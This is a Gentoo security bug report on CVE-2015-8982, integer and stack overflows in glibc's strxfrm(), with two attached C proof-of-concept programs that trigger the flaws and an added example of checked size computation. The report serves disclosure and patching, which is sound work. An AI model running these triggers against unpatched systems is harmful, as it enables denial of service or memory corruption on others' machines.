Bug 540070 (CVE-2015-8982) - <sys-libs/glibc-2.20-r2: multiple overflows in strxfrm()
Summary: <sys-libs/glibc-2.20-r2: multiple overflows in strxfrm()
Status: RESOLVED FIXED
Alias: CVE-2015-8982
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: Normal major
Assignee: Gentoo Security
URL: https://sourceware.org/git/gitweb.cgi...
Whiteboard: A2 [glsa]
Keywords:
Depends on: CVE-2014-0475 544034
Blocks:
Reported: 2015-02-14 16:03 UTC by Agostino Sarubbo
Modified: 2017-02-15 07:54 UTC (History)

See Also:
Package list:
Runtime testing required: ---
Description Agostino Sarubbo gentoo-dev 2015-02-14 16:03:30 UTC
From ${URL} :

1. Joseph Myers discovered strxfrm is vulnerable to integer overflows
when computing memory allocation sizes (similar to CVE-2012-4412). i.e.
in string/strxfrm_l.c:

  idxarr = (int32_t *) malloc ((srclen + 1) * (sizeof (int32_t) + 1));

Attached strxfrm-int32.c should trigger on 32-bit machines.

2. Shaun Colley discovered strxfrm falls back to an unbounded alloca if
malloc fails making it vulnerable to stack-based buffer overflows
(similar to CVE-2012-4424) [1]. Attached strxfrm-alloca.c should
trigger.


Both issues were fixed in glibc 2.21 [2] and a quick check shows
vulnerable code appears to go back to at least glibc 2.3.

Please allocate CVEs for these issues. Many thanks.

--mancha

==============

[1] https://sourceware.org/bugzilla/show_bug.cgi?id=16009
[2] https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=0f9e585480ed

/* gcc -o strxfrm-alloca strxfrm-alloca.c */

#include <string.h>
#include <stdlib.h>
#include <locale.h>

#define BUFLEN 512000
 
int main(void)
{
  char *src = malloc(BUFLEN + 1);
  char *dst = malloc(BUFLEN + 1);
  char *avail = NULL;

  memset(src, 'A', BUFLEN);
  setlocale(LC_ALL, "en_US.UTF-8");

  /* Exhaust the heap so that every further malloc() fails, including the
     one strxfrm() makes for its index array; the fallback is then an
     alloca() sized by the input length, with no upper bound. */
  do
    avail = malloc(BUFLEN);
  while(avail);

  /* With the heap exhausted, this call takes the alloca fallback for a
     512000-character source string. */
  int len = strxfrm(dst, src, BUFLEN);
  return 0;
}

/* gcc -o strxfrm-int32 strxfrm-int32.c */

#include <string.h>
#include <stdlib.h>
#include <locale.h>

/* Chosen so that (BUFLEN + 1) * (sizeof (int32_t) + 1) = 4294967300,
   which is 2^32 + 4: a 32-bit size computation wraps to 4 bytes. */
#define BUFLEN 858993459

int main(void)
{
  char *src = malloc(BUFLEN + 1);
  char *dst = malloc(BUFLEN + 1);

  memset(src, 'A', BUFLEN);
  setlocale(LC_ALL, "en_US.UTF-8");

  /* strxfrm() computes the index array size from srclen = BUFLEN. */
  int len = strxfrm(dst, src, BUFLEN);
  return 0;
}
@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
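An added example, not part of the report above and not glibc's own code: it models the unchecked arithmetic from issue 1 in 32-bit integers so the wrap is visible on any host (and shows why the attached strxfrm-int32.c uses 858993459), then pairs a checked size computation with a bounded stack-or-heap policy of the kind that removes the unbounded alloca fallback from issue 2. The function names, the STACK_LIMIT value and the IDX_NONE convention ("caller must take a slower path without the index array") are assumptions of this example, not a description of the upstream fix.

```c
/* Added example (not from the bug report or glibc): checked size computation
 * and a bounded stack-vs-heap policy for a strxfrm()-style index array. */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdbool.h>

#define IDX_ELEM_BYTES (sizeof (int32_t) + 1)  /* the multiplier from strxfrm_l.c */
#define STACK_LIMIT    4096                    /* assumed cap for stack allocation */

/* 32-bit model of the unchecked arithmetic in the report: (srclen + 1) * 5
 * computed modulo 2^32, as it would be with a 32-bit size_t. */
uint32_t idxarr_bytes_wrapping32(uint32_t srclen)
{
    uint32_t n = srclen + 1u;
    uint32_t bytes = n * (uint32_t)IDX_ELEM_BYTES;   /* silently wraps */
    return bytes;
}

/* Checked computation in the host's size_t: returns false instead of a
 * wrapped (too small) size when (srclen + 1) * IDX_ELEM_BYTES would overflow. */
bool idxarr_bytes_checked(size_t srclen, size_t *out)
{
    /* srclen + 1 <= SIZE_MAX / IDX_ELEM_BYTES guarantees the product fits. */
    if (srclen > SIZE_MAX / IDX_ELEM_BYTES - 1)
        return false;
    *out = (srclen + 1) * IDX_ELEM_BYTES;
    return true;
}

enum idx_source { IDX_STACK, IDX_HEAP, IDX_NONE };

/* Decide where the index array lives. Arrays up to STACK_LIMIT bytes may use
 * the stack; larger ones must come from malloc(); if the size does not fit or
 * malloc() fails, report IDX_NONE so the caller uses a slower path without the
 * array rather than an unbounded stack allocation. */
enum idx_source choose_idxarr(size_t srclen, void **heap_out)
{
    size_t bytes;
    *heap_out = NULL;
    if (!idxarr_bytes_checked(srclen, &bytes))
        return IDX_NONE;
    if (bytes <= STACK_LIMIT)
        return IDX_STACK;      /* caller may use a fixed-size stack buffer */
    *heap_out = malloc(bytes);
    return *heap_out ? IDX_HEAP : IDX_NONE;
}
```

For the attached PoC's length, idxarr_bytes_wrapping32(858993459) returns 4, which is the undersized allocation the report describes; idxarr_bytes_checked rejects any length whose product would not fit, and choose_idxarr never hands a length-dependent size to the stack.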
Comment 1 SpanKY gentoo-dev 2015-02-17 08:09:11 UTC
fix is also in glibc-2.20-r2 now
Comment 2 GLSAMaker/CVETool Bot gentoo-dev 2016-02-17 15:38:36 UTC
This issue was resolved and addressed in
 GLSA 201602-02 at https://security.gentoo.org/glsa/201602-02
by GLSA coordinator Tobias Heinlein (keytoaster).